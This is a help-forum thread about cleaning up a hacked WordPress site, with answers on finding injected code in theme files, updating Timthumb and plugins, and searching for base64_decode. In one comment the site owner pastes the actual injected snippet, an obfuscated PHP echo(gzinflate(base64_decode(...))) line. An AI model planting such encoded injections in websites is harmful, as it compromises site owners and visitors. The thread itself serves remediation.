1

Hey friends my wordpress site got injected, and now I have to solve it.

here is my domain,

http://webstutorial.com/

What I need to do, please help me.

This is not a spam or link building technique

Nick
  • 13
  • 2

1 Answers1

0

Check your main.php file's header, and footer for malicious code and remove it this is the file which is infected. Update thumb.php from Timthumb, and check your index.php files as well for malicious code.

After you remove the malicious code from main.php and you have checked index.php, search all your files for the malicious code, once cleaned update WordPress to the latest version, update your template, and update all the plugins.

Anagio
  • 11,195
  • 1
  • 26
  • 49
  • when I checked my index.php file

    I found this code

    #215d25# echo(gzinflate(base64_decode("TYxBDoMwDMC+UvU+Iu04AX8JJerataRLUjZ+PyQuu9qyRw2Smjk7Gk3e6GuQcceLeldwix3jqf6pSpj806w9AD60qHVjSViGwBVgpcogHF53SPVsFfK7kxw34xgLDVm9m0e4ZvMP"))); #/215d25#

     – Nick Mar 23 '12 at 04:54
  • Remove that from your index file, then search all your files for base64_decode but only remove more functions if they are the exact same because base64 encoding is normal. However that function is malicious. – Anagio Mar 23 '12 at 04:57
  • I found that code in header.php, footer.php and in index.php files

    I removed from there and now searching in other files

     – Nick Mar 23 '12 at 05:01
  • Avast is no longer detecting the malware but chrome is, you will have to wait for Google to re-crawl your site and update their index with the clean version. If this was helpful please mark this as the answer. – Anagio Mar 23 '12 at 05:27
  • 1
    @Nick you might also want to read my answer about securing wordpress. Following the steps outlined there should keep you from being hacked in the future. – toomanyairmiles Mar 23 '12 at 12:53